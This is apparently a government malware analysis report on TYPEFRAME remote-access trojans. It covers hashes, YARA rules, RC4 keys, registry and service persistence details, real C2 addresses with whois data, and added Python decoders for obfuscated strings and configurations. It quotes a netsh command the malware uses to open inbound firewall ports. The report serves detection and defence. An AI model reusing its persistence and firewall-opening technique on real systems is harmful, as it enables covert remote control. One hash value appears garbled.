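The three encodings in the snippet (character shift for file names, the Jdhcuad rotation, and hex text XORed with 231) can be reversed statically without opening the document. The following Python is an added analyst example, not part of the NCCIC report; the function names and the constructed sample stub are this example's own.

```python
import struct

XOR_KEY = 231      # from the macro: offBin(inx) = offBin(inx) Xor 231
BLOCK_LEN = 500    # offBin(499): each array element carries up to 500 bytes


def shift_decode(encoded, shift=1):
    """Undo the file-name encoding: every character code minus `shift`."""
    return "".join(chr(ord(ch) - shift) for ch in encoded)


def jdhcuad(encoded):
    """Python port of the macro's Jdhcuad() string decoder.

    VBA evaluates Mod before +, so the macro computes
    46 + ((code - 46 - 20 + 76) Mod 76): a rotation by 20 inside the
    76-character window that starts at '.' (code 46).
    """
    low, span, rotation = 46, 122 - 46, 20
    return "".join(
        chr(low + (ord(ch) - low - rotation + span) % span) for ch in encoded
    )


def decode_chunks(hex_chunks, key=XOR_KEY):
    """Turn the macro's hex string array back into the bytes written to disk."""
    out = bytearray()
    for index, chunk in enumerate(hex_chunks, start=1):
        if len(chunk) % 2 or len(chunk) > 2 * BLOCK_LEN:
            raise ValueError(f"str({index}): unexpected length {len(chunk)}")
        try:
            raw = bytes.fromhex(chunk)
        except ValueError as exc:
            raise ValueError(f"str({index}): not hex data") from exc
        out.extend(b ^ key for b in raw)
    return bytes(out)


def looks_like_pe(data):
    """Same test as the report's YARA condition: 'MZ' at 0, 'PE' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 2] == b"PE"


def constructed_sample():
    """Constructed input: a 68-byte stub with MZ/PE markers, encoded the macro's way.

    The real hex data is redacted in the report, so this stub stands in for it.
    """
    stub = bytearray(0x44)
    stub[0:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)
    stub[0x40:0x44] = b"PE\x00\x00"
    encoded = bytes(b ^ XOR_KEY for b in stub).hex().upper()
    return [encoded[:80], encoded[80:]], bytes(stub)


if __name__ == "__main__":
    print(shift_decode("mfp/fyf"))
    print(shift_decode("tfdvsjuzxbsojoh`mndjsu`514/epd"))
    print(jdhcuad("kgw:18<Bg0y44"))
    chunks, _ = constructed_sample()
    print(looks_like_pe(decode_chunks(chunks)))
```

The decoded strings give defenders concrete things to look for: the two file names written under %TEMP% and the COM object the macro instantiates to run the dropped binary.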

c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777

Tags

remote-access-trojan, trojan

Details
Name: BFB41BC0C3856AA0A81A5256B7B8DA51
Size: 578174 bytes
Type: PE32+ executable (GUI) x86-64, for MS Windows
MD5: bfb41bc0c3856aa0a81a5256b7b8da51
SHA1: cb96e29332fe94d1a70309837f73daf7bec81284
SHA256: c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
SHA512: 37223163a329ffa7b77a9190aab1da5fbf38c6d76139591d592d695e5caa81b56f6d3769540e2781c87a29de3d39e5e9c8ee70bd9ed6a0bee040917f530bc11a
ssdeep: 12288:jxn1kOPTkEjkHsnCrYHM46QyFgHj+u1XC1GbA/UXAfAGZI3PWM+:jxn1kOLkEQHsYYDdD+u1HbA/Uw47/L+
Entropy: 7.848313
Antivirus
Ahnlab: Trojan/Win32.Akdoor
Yara Rules
hidden_cobra_consolidated.yara
rule enc_PK_header
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
    strings:
        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
        $s1 = {B6 DF 01 FD 48 B5 }
        $s2 = {B6 D5 0E F3 4E B5 }
        $s3 = {B7 DF 0E EE }
        $s4 = {B6 DF 03 FC }
        $s5 = {A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-06-05 21:21:48-04:00
Import Hash: c1bcec5e2d5d967daefaff0a252273a6
PE Sections
MD5                               Name    Raw Size  Entropy
55b6d1ed6d76c7d17cc270bc1843d2cb  header  1024      2.558659
6e501513865a783fa945269010ac3785  .text   69632     6.390707
45584c7afdc086b651d7299673643506  .rdata  24064     4.704433
4a8e757aef91c54de52d5b81098e0cc7  .data   7680      4.003255
de3fe99833797faa77379640174d16c4  .pdata  4096      4.786623
0cc425d0556c63acb7c04b9b1a211d5b  .rsrc   512       5.105006
914f25782a74f42e42d7974b13bd01c8  .reloc  1536      2.869845
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Relationships
c9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
Description

This file is a 64-bit Windows executable version of the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 and is designed to install a RAT as a service on the victim’s system. This file accepts the following arguments during execution: "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd".

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
host.dll
"Task Notification Service"
"Monitors And Notifies Task Scheduling And Interaction"
netsvcs
--End strings of interest--

When executed, the RAT loads an embedded RC4 encrypted archive file that starts at offset "0x1A800" of the file.

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a malicious DLL module, which is decompressed and installed into "C:\Windows\system32\dwnhost.dll". The first three characters of the module name are randomly generated.

The malware contains RC4 encrypted configuration file data (192 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\dwnhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The malware installs the malicious DLL module as a ServiceDll in the "netsvcs" service group so that the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe", executes "C:\Windows\system32\dwnhost.dll". The service name and the display name are randomly generated.

The installed service information is displayed below:

--Begin service--
ServiceName = "NWCWorkstation"
DisplayName = "NWCWorkstation"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k netsvcs"
--End service--

e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef

Tags

remote-access-trojan, trojan

Details
Name: dwnhost.dll
Size: 1030144 bytes
Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5: 9722bc9e0efb4214116066d1ff14094c
SHA1: 41a938499048a6ad8034d09e2fbb893da8f13ca9
SHA256: e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
SHA512: 8470c240868441093314ebe263028ceef61d900b41aaeed77fd934edf81b9a75f6c96d0fccc0ac87364c8e23e0b8eb19ec8bcd47daf1d50c1182be999475fc4c
ssdeep: 12288:nqU713B5hV7rJIBBAVbyjRbjSbdSYJ3raxt7o6qRBpDwQmnQ2bqPjD+PmCNVGsPf:nRxJIB7hSZSG37jo/GsPepCdOwy
Entropy: 6.424883
Antivirus

No matches found.

Yara Rules
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
        $s1 = {B6 DF 01 FD 48 B5 }
        $s2 = {B6 D5 0E F3 4E B5 }
        $s3 = {B7 DF 0E EE }
        $s4 = {B6 DF 03 FC }
        $s5 = {A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

Relationships
e088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
Description

dwnhost.dll (original name: DLL64.dll) is a 64-bit Windows dynamic-link library (DLL) of "laxhost.dll" (a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6). This RAT module was installed as a service by the file "c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777".

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

When executed, the RAT loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\dwnxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains a hexadecimal encoded command and control IP address and port number:

--Begin IP and port # list--
BB 01 3B 5A 5D 61 ==> 59.90.93.97:443
--End IP and port # list--

The malware attempts to connect to its remote server IP 59.90.93.97 using port 443 and waits for instructions.

The malware is designed to accept instructions from the remote server to perform the following functions:

--Begin functions performed by the malware--
Get Disk Free Space
Search for files
Execute process in elevated mode
Terminate processes
Delete files
Execute command using shell
Download and upload files
Read files and write files
Delete Service and uninstall malware components using a batch script
--End functions performed by the malware--

20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

Tags

remote-access-trojan, trojan

Details
Name: EF9DB20AB0EEBF0B7C55AF4EC0B7BCED
Size: 152064 bytes
Type: PE32+ executable (GUI) x86-64, for MS Windows
MD5: ef9db20ab0eebf0b7c55af4ec0b7bced
SHA1: 0202942d11c994cece943bb873f3af156d820f59
SHA256: 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
SHA512: 85fa80079c59da83e3b2471eab0d2981c92b6c589cbe5052bf438831ae464e6499040ead68d6bc9929edd9f6c08ecc6abf2a0173e31bd361a24fad89ff1f7064
ssdeep: 3072:qocqUTuIzXblpGxqSDBiiBmLEEjdTIf3TIb9Qw/uAZyerrPabYlQ:qJqUnXKxqSAiBJyTC3TIb9QRL0lQ
Entropy: 6.269643
Antivirus
ESET: a variant of Win64/NukeSped.L trojan
Microsoft Security Essentials: Trojan:Win32/Autophyte.A!dha
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2016-09-07 14:28:45-04:00
Import Hash: 13c53cfa11bb74ea99fefdf29d78a9f9
PE Sections
MD5                               Name    Raw Size  Entropy
2082ea5adc4b910e8673c04dc7d962d2  header  1024      2.623906
e6e5ce270a5e80221a815dbf739883a2  .text   111616    6.434048
3a7628ebb18c5e07cf37654fd431de6b  .rdata  26112     5.315772
52e12517ca5b2c29e9496bc3032f0d5d  .data   5632      2.052338
f9b37a6c76a99538605929f5bef6c2e2  .pdata  5632      5.165417
d5ecc406ee2be45ed510958b0d4f326a  .rsrc   512       5.112624
07b2edf2675fa88a86c977fec3ad03cd  .reloc  1536      2.826598
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Relationships
20abb95114... Connected_To 98.101.211.162
20abb95114... Connected_To 81.0.213.173
Description

This file is a 64-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s file APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End RC4 key--

This file is a variant of a RAT that contains the following embedded hexadecimal-encoded C2 IP address and port number:

--Begin IP and port # list--
1BBh ==> 443
0A2D36562h ==> 98.101.211.162
0ADD50051h ==> 81.0.213.173
--End IP and port # list--

When executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to accept instructions from the remote server to perform additional functions.
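The report shows C2 endpoints in two notations: a 6-byte record from the decrypted dwnhost.dll configuration ("BB 01 3B 5A 5D 61") and little-endian dword immediates ("0A2D36562h"). The following Python is an added example for responders, not code from the report: it decrypts a registry "Description" blob and decodes both notations. It assumes the malware uses standard RC4 and that the endpoint record sits at the offset passed in; the report states neither, and the sample blob is constructed.

```python
import ipaddress
import struct

# RC4 key printed in the report for dwnhost.dll and its installer.
RC4_KEY = bytes.fromhex("85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B")
CONFIG_LEN = 192  # size of the encrypted configuration data given in the report


def rc4(key, data):
    """Standard RC4 (KSA + PRGA); decryption is the same operation as encryption."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 0xFF])
    return bytes(out)


def parse_endpoint(record):
    """Decode the 6-byte form: little-endian port followed by the four IPv4 octets."""
    if len(record) != 6:
        raise ValueError("endpoint record must be exactly 6 bytes")
    (port,) = struct.unpack_from("<H", record, 0)
    return str(ipaddress.IPv4Address(record[2:6])), port


def dword_to_ip(listing_value):
    """Decode a disassembly immediate such as '0A2D36562h' (IPv4 stored little-endian)."""
    value = int(listing_value.strip().lower().rstrip("h"), 16)
    if value > 0xFFFFFFFF:
        raise ValueError("immediate does not fit in 32 bits")
    return str(ipaddress.IPv4Address(struct.pack("<I", value)))


def endpoint_from_config(encrypted, key=RC4_KEY, offset=0):
    """Decrypt a 'Description' registry value and read one endpoint record.

    ASSUMPTION: `offset` is where the record starts in the plaintext; the
    report does not document the configuration layout.
    """
    plain = rc4(key, encrypted)
    return parse_endpoint(plain[offset:offset + 6])


def constructed_config_blob():
    """Constructed sample: the report's 6-byte record, zero padded to 192 bytes."""
    plain = bytes.fromhex("BB013B5A5D61").ljust(CONFIG_LEN, b"\x00")
    return rc4(RC4_KEY, plain)


if __name__ == "__main__":
    print(endpoint_from_config(constructed_config_blob()))
    for immediate in ("0A2D36562h", "0ADD50051h"):
        print(immediate, "=>", dword_to_ip(immediate))
```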

201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33

Tags

proxy, trojan

Details
Name: 1C53E7269FE9D84C6DF0A25BA59B822C
Size: 126976 bytes
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5: 1c53e7269fe9d84c6df0a25ba59b822c
SHA1: b775d753671133cbc4919764d2fac0d298166b07
SHA256: 201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33
SHA512: 3d3883b9b29e264d023b7034d980b7c206c9fc82010bf7f5f1dc454fdbd316830fe69e90579406a74afc1fca8e266d10c1b46784bd661dcb2815e370a68acd32
ssdeep: 1536:EaMa/KVyD4hv6LLETuA1x+sh2iE1s44tz4qoWYUwnZ7hUOC2:G8YPZ6LLqQFX4tz4quxY
Entropy: 6.024087
Antivirus
Ahnlab: Win-Trojan/Hwdoor.Gen
BitDefender: Gen:Trojan.Heur.LP.hu4@amSEbedG
ESET: a variant of Win32/NukeSped.AK trojan
Emsisoft: Gen:Trojan.Heur.LP.hu4@amSEbedG (B)
F-secure: Gen:Trojan.Heur.LP.hu4@amSEbedG
Microsoft Security Essentials: Trojan:Win32/Autophyte.B!dha
Symantec: Heur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yara
rule import_deob
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        md5 = "ae769e62fef4a1709c12c9046301aa5d"
        md5 = "e48fe20eblf5a5887f2ac631fed9ed63"
    strings:
        $ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
        $ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2015-07-08 22:50:54-04:00
Import Hash: 21ccd1b1341683d8831663fc3ed8f86d
PE Sections
MD5                               Name    Raw Size  Entropy
f066de8df54d4f92795472d981374309  header  4096      0.736742
e321dba33ae4db3b9e29aa6072b92e77  .text   57344     6.464385
a256d5f52608331df8545a9d38751462  .rdata  8192      3.628560
1d905ad87919346eb6c8463f61b599e8  .data   16384     1.547483
afdf2120655e37010482a536d552199e  .rsrc   32768     7.100033
bbeec3983cc5b2094f8311718d327480  .reloc  8192      3.234713
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Description

This file (original name: Proxy_SVC_DLL.dll) is a proxy module installed as a service. The proxy installer that installs this module was not available for analysis.

This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server. The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End RC4 key--

When executed, the proxy installer will attempt to load and decrypt the encrypted configuration file data from the registry using the RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

Analysis indicates that the decrypted configuration data contains port numbers. The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections:

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=<decrypted port number> action=allow enable=yes"
--End firewall modification--

The malware attempts to open the predefined port and waits for a connection. The malware contains public SSL certificates in its resource named "101". It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

98.101.211.162

Ports
  • 443 TCP
Whois

NetRange:     98.100.0.0 - 98.103.255.255
CIDR:         98.100.0.0/14
NetName:        RCMS
NetHandle:     NET-98-100-0-0-1
Parent:         NET98 (NET-98-0-0-0-0)
NetType:        Direct Allocation
OriginAS:    
Organization: Time Warner Cable Internet LLC (RCMS)
RegDate:        2008-03-17
Updated:        2009-05-05
Ref:            https://whois.arin.net/rest/net/NET-98-100-0-0-1


OrgName:        Time Warner Cable Internet LLC
OrgId:         RCMS
Address:        6399 S Fiddlers Green Circle
City:         Greenwood Village
StateProv:     CO
PostalCode:     80111
Country:        US
RegDate:        2001-09-25
Updated:        2018-03-07
Comment:        Allocations for this OrgID serve Road Runner commercial customers out of the Columbus, OH, Herndon, VA and Raleigh, NC RDCs.
Ref:            https://whois.arin.net/rest/org/RCMS

Relationships
98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

81.0.213.173

Ports
  • 443 TCP
Whois

inetnum:        81.0.213.168 - 81.0.213.175
netname:        CmsConsulting-CZ
descr:         CMS Consulting s.r.o.
country:        CZ
admin-c:        CASA3-RIPE
tech-c:         CASA3-RIPE
status:         ASSIGNED PA
mnt-by:         CASABLANCA-RIPE-MNT
created:        2009-10-09T07:31:35Z
last-modified: 2009-10-09T07:31:35Z
source:         RIPE

role:         Casablanca INT RIPE manager
address:        Casablanca INT
address:        Vinohradska 184, Prague 3 - 130 52
address:        Czech republic
phone:         +420 270 000 270
fax-no:         +420 270 000 277
e-mail:         hostmaster@casablanca.cz
abuse-mailbox: abuse@casablanca.cz
admin-c:        JH1771-RIPE
tech-c:         JH1771-RIPE
notify:         hostmaster@casablanca.cz
nic-hdl:        CASA3-RIPE
created:        2005-09-05T10:42:10Z
last-modified: 2015-07-03T11:19:49Z
source:         RIPE
mnt-by:         CASABLANCA-CORE-MNT

% Information related to '81.0.213.0/24AS15685'

route:         81.0.213.0/24
descr:         Casablanca INT prefix fraction
origin:         AS15685
mnt-by:         CASABLANCA-CORE-MNT
created:        2017-06-30T09:41:16Z
last-modified: 2017-06-30T09:41:16Z
source:         RIPE

Relationships
81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

184.107.209.2

Ports
  • 443 TCP
Whois

Domain Name: TVDAIJIWORLD.COM
Registry Domain ID: 632237350_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2017-10-16T06:44:25Z
Creation Date: 2006-10-14T19:18:50Z
Registrar Registration Expiration Date: 2018-10-14T19:18:50Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: ******** ******** (see Notes section below on how to view unmasked data)
Registrant Organization: Konkandaiz
Registrant Street: Post Box 53608
Registrant Street: Dubai
Registrant City: Dubai
Registrant State/Province: Not Applicable
Registrant Postal Code: 04
Registrant Country: AE
Registrant Phone: ************
Registrant Phone Ext:
Registrant Fax: 111111111111
Registrant Fax Ext:
Registrant Email: ********@*****.***
Registry Admin ID: Not Available From Registry
Admin Name: ******** ******** (see Notes section below on how to view unmasked data)
Admin Organization: Konkandaiz
Admin Street: Post Box 53608
Admin Street: Dubai
Admin City: Dubai
Admin State/Province: Not Applicable
Admin Postal Code: 04
Admin Country: AE
Admin Phone: ************
Admin Phone Ext:
Admin Fax: 111111111111
Admin Fax Ext:
Admin Email: ********@*****.***
Registry Tech ID: Not Available From Registry
Tech Name: ******** ******** (see Notes section below on how to view unmasked data)
Tech Organization: Konkandaiz
Tech Street: Post Box 53608
Tech Street: Dubai
Tech City: Dubai
Tech State/Province: Not Applicable
Tech Postal Code: 04
Tech Country: AE
Tech Phone: ************
Tech Phone Ext:
Tech Fax: 111111111111
Tech Fax Ext:
Tech Email: ********@*****.***
Name Server: MY.PRIVATEDNS.COM
Name Server: YOUR.PRIVATEDNS.COM
DNSSEC: unsigned

Relationships
184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

111.207.78.204

Ports
  • 443 TCP
Whois

inetnum:        111.192.0.0 - 111.207.255.255
netname:        UNICOM-BJ
descr:         China Unicom Beijing province network
descr:         China Unicom
country:        CN
admin-c:        CH1302-AP
tech-c:         SY21-AP
remarks:        service provider
mnt-by:         APNIC-HM
mnt-lower:     MAINT-CNCGROUP
mnt-lower:     MAINT-CNCGROUP-BJ
mnt-routes:     MAINT-CNCGROUP-RR
status:         ALLOCATED PORTABLE
mnt-irt:        IRT-CU-CN
last-modified: 2016-05-04T00:18:25Z
irt:            IRT-CU-CN
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
e-mail:         hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
auth:         # Filtered
mnt-by:         MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
person:         ChinaUnicom Hostmaster
nic-hdl:        CH1302-AP
e-mail:         hqs-ipabuse@chinaunicom.cn
address:        No.21,Jin-Rong Street
address:        Beijing,100033
address:        P.R.China
phone:         +86-10-66259764
fax-no:         +86-10-66259764
country:        CN
mnt-by:         MAINT-CNCGROUP
last-modified: 2017-08-17T06:13:16Z
person:         sun ying
address:        fu xing men nei da jie 97, Xicheng District
address:        Beijing 100800
country:        CN
phone:         +86-10-66030657
fax-no:         +86-10-66078815
e-mail:         hostmast@publicf.bta.net.cn
nic-hdl:        SY21-AP
mnt-by:         MAINT-CNCGROUP-BJ
last-modified: 2009-06-30T08:42:48Z
source:         APNIC

Relationships
111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

80.91.118.45

Ports
  • 443 TCP
Whois

inetnum:        80.91.118.0 - 80.91.119.255
netname:        Abissnet
descr:         Business Customers
country:        AL
admin-c:        AB34506-RIPE
tech-c:         AB34506-RIPE
status:         ASSIGNED PA
mnt-by:         AS35047-MNT
created:        2014-10-24T10:09:33Z
last-modified: 2016-06-09T09:47:15Z
source:         RIPE
role:         Abissnet BBone
address:        Rr. Ismail Qemali, P. Abissnet
e-mail:         bbone@abissnet.al
abuse-mailbox: bbone@abissnet.al
nic-hdl:        AB34506-RIPE
mnt-by:         AS35047-MNT
created:        2016-06-09T08:09:15Z
last-modified: 2016-06-09T08:41:05Z
source:         RIPE

% Information related to '80.91.118.0/24AS35047'

route:         80.91.118.0/24
descr:         Abissnet ISP
origin:         AS35047
mnt-by:         AS35047-MNT
created:        2011-02-27T10:24:58Z
last-modified: 2011-02-27T10:24:58Z
source:         RIPE

Relationships
80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

181.119.19.56

Ports
  • 443 TCP
Whois

NetRange:     181.0.0.0 - 181.255.255.255
CIDR:         181.0.0.0/8
NetName:        LACNIC-181
NetHandle:     NET-181-0-0-0-0
Parent:         ()
NetType:        Allocated to LACNIC
OriginAS:    
Organization: Latin American and Caribbean IP address Regional Registry (LACNIC)
RegDate:        1993-04-30
Updated:        2010-07-21
Comment:        This IP address range is under LACNIC responsibility
Comment:        for further allocations to users in LACNIC region.
Comment:        Please see http://www.lacnic.net/ for further details,
Comment:        or check the WHOIS server located at http://whois.lacnic.net
Ref:            https://whois.arin.net/rest/net/NET-181-0-0-0-0
OrgName:        Latin American and Caribbean IP address Regional Registry
OrgId:         LACNIC
Address:        Rambla Republica de Mexico 6125
City:         Montevideo
StateProv:    
PostalCode:     11400
Country:        UY
RegDate:        2002-07-26
Updated:        2018-03-15
Ref:            https://whois.arin.net/rest/org/LACNIC

Relationships
181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

59.90.93.97

Ports
  • 443 TCP
Whois

inetnum:        59.90.64.0 - 59.90.127.255
netname:        BB-Multiplay
descr:         O/o DGM BB, NOC BSNL Bangalore
country:        IN
admin-c:        BH155-AP
tech-c:         DB374-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-IN-DOT
mnt-irt:        IRT-BSNL-IN
last-modified: 2011-02-18T09:27:20Z
source:         APNIC

irt:            IRT-BSNL-IN
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited
address:        8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
e-mail:         abuse@bsnl.in
abuse-mailbox: abuse@bsnl.in
admin-c:        NC83-AP
tech-c:         CGMD1-AP
auth:         # Filtered
mnt-by:         MAINT-IN-DOT
last-modified: 2017-10-20T05:42:50Z
source:         APNIC

person:         BSNL Hostmaster
nic-hdl:        BH155-AP
e-mail:         hostmaster@bsnl.in
address:        Broadband Networks
address:        Bharat Sanchar Nigam Limited
address:        2nd Floor, Telephone Exchange, Sector 62
address:        Noida
phone:         +91-120-2404243
fax-no:         +91-120-2404241
country:        IN
mnt-by:         MAINT-IN-PER-DOT
last-modified: 2015-11-12T06:00:14Z
person:         DGM Broadband
address:        BSNL NOC Bangalore
country:        IN
phone:         +91-080-25805800
fax-no:         +91-080-25800022
e-mail:         dnwplg@bsnl.in
nic-hdl:        DB374-AP
mnt-by:         MAINT-IN-PER-DOT
last-modified: 2011-02-19T10:03:44Z
source:         APNIC

% Information related to '59.90.80.0/20AS9829'

route:         59.90.80.0/20
descr:         BSNL Internet
country:        IN
origin:         AS9829
mnt-lower:     MAINT-IN-DOT
mnt-routes:     MAINT-IN-DOT
mnt-by:         MAINT-IN-AS9829
last-modified: 2008-09-04T07:54:47Z
source:         APNIC

Relationships
59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Relationship Summary

8c3e0204f5... Contains a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
a71017302e... Connected_To 59.90.93.97
a71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
e69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
d1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
546dbd370a... Contains 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
